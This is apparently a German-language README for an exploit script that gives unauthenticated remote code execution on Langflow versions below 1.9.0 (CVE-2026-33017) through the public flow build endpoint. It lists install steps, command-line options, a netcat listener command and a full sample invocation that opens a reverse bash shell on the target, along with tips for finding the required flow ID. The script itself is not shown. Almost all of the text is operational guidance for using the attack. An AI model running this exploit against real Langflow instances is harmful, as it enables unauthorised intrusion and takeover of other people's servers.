
Unauthentifizierte RCE in Langflow <1.9.0 (CVE-2026-33017) Exploit
Ausführung von entferntem Code für Langflow über den build_public_tmp-Endpunkt.
Exploit über den Public Flow Build Endpunkt, der eine Reverse Shell auf dem Ziel ausführt.
httpx-BibliothekInstallation:
pip install httpx
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
-u, --url : Basis-URL der Langflow-Instanz (z.B. https://flow.example.com/)-l, --lhost : Ihre IP-Adresse zum Empfangen der Reverse Shell-p, --lport : Listening-Port für die Reverse Shell-f --flow-id : Ziel-Flow-ID (erforderlich – abrufbar von /api/v1/flows/ oder der Benutzeroberfläche)-c --client-id : Wert des client_id-Cookies zur SitzungsidentifikationStarten Sie einen Listener:
nc -nlvp 9001
Führen Sie den Exploit aus:
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
Bei Erfolg erhalten Sie eine interaktive Bash-Shell.
flow-id ist erforderlich. Listen Sie alle Flows über GET /api/v1/flows auf oder kopieren Sie sie aus der Browser-URL.MIT – für Bildungs- und ethische Sicherheitsforschung.